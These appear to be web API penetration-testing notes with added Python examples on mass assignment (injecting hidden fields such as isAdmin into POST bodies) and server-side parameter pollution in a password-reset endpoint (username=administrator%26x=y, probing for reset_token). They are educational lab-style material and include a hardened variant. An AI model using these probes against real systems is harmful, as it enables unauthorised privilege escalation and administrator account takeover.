API Testing - TODO

When an API call performs a GET request and directly afterwards a POST (for example, fetching the current user's profile and then updating it), compare the JSON objects. Parameters that appear in the response body but are never sent by the client are hidden fields. Adding such a hidden field to the POST body, e.g. {"admin":true}, may be accepted by a handler that binds the whole request body onto the user object (mass assignment) and can elevate access to a higher-privileged user or expose sensitive information about the user. Confirm with a follow-up GET that the value actually changed; a 200 response on the POST alone proves nothing.
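The following is an added Python example, not code from the original notes, showing the workflow above: diff the GET response against the fields the client really submits, generate one probe POST body per hidden field, and compare a before/after GET to see which field the server honoured. The user object, its field names (roleid, isAdmin) and the submitted field list are constructed sample data.

```python
import json

# Constructed sample data (not from the original notes): the JSON a GET /api/user
# returns for the current user, and the one field the client form actually POSTs.
SAMPLE_GET_RESPONSE = (
    '{"username": "wiener", "email": "wiener@example.com", '
    '"roleid": 1, "isAdmin": false}'
)
SUBMITTED_FIELDS = ["email"]


def hidden_fields(get_json, submitted):
    """Keys the server exposes in its user object that the client never sends.

    These are the mass-assignment candidates: if the update handler binds the
    whole request body onto the same object, the server may accept them too.
    """
    obj = json.loads(get_json)
    return {k: v for k, v in obj.items() if k not in submitted}


def candidate_values(value):
    """Privilege-escalating guesses derived from the field's current type."""
    if isinstance(value, bool):          # bool before int: True is an int subclass
        return [True]
    if isinstance(value, int):
        return [0, 1]                     # low ids commonly map to admin roles
    if isinstance(value, str):
        return ["admin", "administrator"]
    return [value]


def probe_bodies(get_json, submitted, base_body):
    """One POST body per (hidden field, candidate value), built on the legitimate body."""
    bodies = []
    for key, current in hidden_fields(get_json, submitted).items():
        for cand in candidate_values(current):
            body = dict(base_body)
            body[key] = cand
            bodies.append(body)
    return bodies


def changed_fields(before_json, after_json):
    """Keys whose value differs between the GET before and the GET after a probe.

    A hidden field that changed is the proof that the server honoured it.
    """
    before, after = json.loads(before_json), json.loads(after_json)
    return sorted(k for k in set(before) | set(after) if before.get(k) != after.get(k))


if __name__ == "__main__":
    base = {"email": "wiener@example.com"}
    for body in probe_bodies(SAMPLE_GET_RESPONSE, SUBMITTED_FIELDS, base):
        print(json.dumps(body))   # send each with the real session, then re-GET
    # Constructed "after" response for a server that accepted {"isAdmin": true}.
    after = ('{"username": "wiener", "email": "wiener@example.com", '
             '"roleid": 1, "isAdmin": true}')
    print(changed_fields(SAMPLE_GET_RESPONSE, after))
```

Send one probe body at a time and re-fetch the object after each; testing several hidden fields in one request makes it impossible to tell which one the server accepted.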

API Reset Password Parameter Pollution

Notice that the reset-password API function takes the username as a parameter in the POST body. To identify additional hidden parameters handled by the back end, insert a random parameter such as &x=y and observe whether the error message changes or leaks information (a positive result). Because the value is passed on into a server-side query string, URL-encode the ampersand so the public endpoint treats the injection as part of the existing parameter value: username=administrator%26x=y.

Based on the response, there is possibly a second parameter named field, and reviewing the JavaScript source code reveals a reset_token parameter.
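The following is an added Python example, not code from the original notes, that builds the polluted body above and simulates both hops: the public endpoint decodes the form once, then a hypothetical internal lookup URL is built either by unsafe concatenation (the vulnerable case, where the injected &x=y or &field=reset_token becomes a separate back-end parameter) or by re-encoding the value (the hardened case). The internal path /internal/users/reset is an assumption.

```python
from urllib.parse import parse_qs, quote, urlencode

# Constructed example (not the original notes' code): the public reset endpoint
# reads `username` from the form body and forwards it to an internal lookup.


def polluted_body(username, param, value):
    """Form body that smuggles an extra back-end parameter inside the username value.

    Only the ampersand needs encoding: the public endpoint decodes the body once,
    so the value arrives as 'username&param=value'. The '=' is left unencoded to
    match the notes' payload, username=administrator%26x=y.
    """
    return "username=" + quote(f"{username}&{param}={value}", safe="=")


def frontend_username(form_body):
    """What the public endpoint sees after one round of form decoding."""
    return parse_qs(form_body)["username"][0]


def internal_url_vulnerable(username):
    """Vulnerable concatenation (assumed behaviour of the hypothetical back end):
    the decoded value is pasted into the internal query string unescaped, so the
    '&' splits it into a second parameter."""
    return "/internal/users/reset?username=" + username


def internal_url_hardened(username):
    """Hardened: re-encode the value for the internal hop; '&' becomes %26."""
    return "/internal/users/reset?" + urlencode({"username": username})


def backend_params(internal_url):
    """Parameters the back end actually parses from the internal request."""
    return parse_qs(internal_url.split("?", 1)[1], keep_blank_values=True)


def backend_view(form_body, build_url):
    """End-to-end: form body -> public decode -> internal URL -> back-end params."""
    return backend_params(build_url(frontend_username(form_body)))


if __name__ == "__main__":
    for param, value in (("x", "y"), ("field", "reset_token")):
        body = polluted_body("administrator", param, value)
        print(body)
        print("  vulnerable back end sees:", backend_view(body, internal_url_vulnerable))
        print("  hardened back end sees:  ", backend_view(body, internal_url_hardened))
```

The tell in a real target is the difference in the error message between the two cases: a back end that sees x=y as its own parameter typically complains about an unknown or unexpected parameter, while a hardened one complains about an unknown user named "administrator&x=y".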
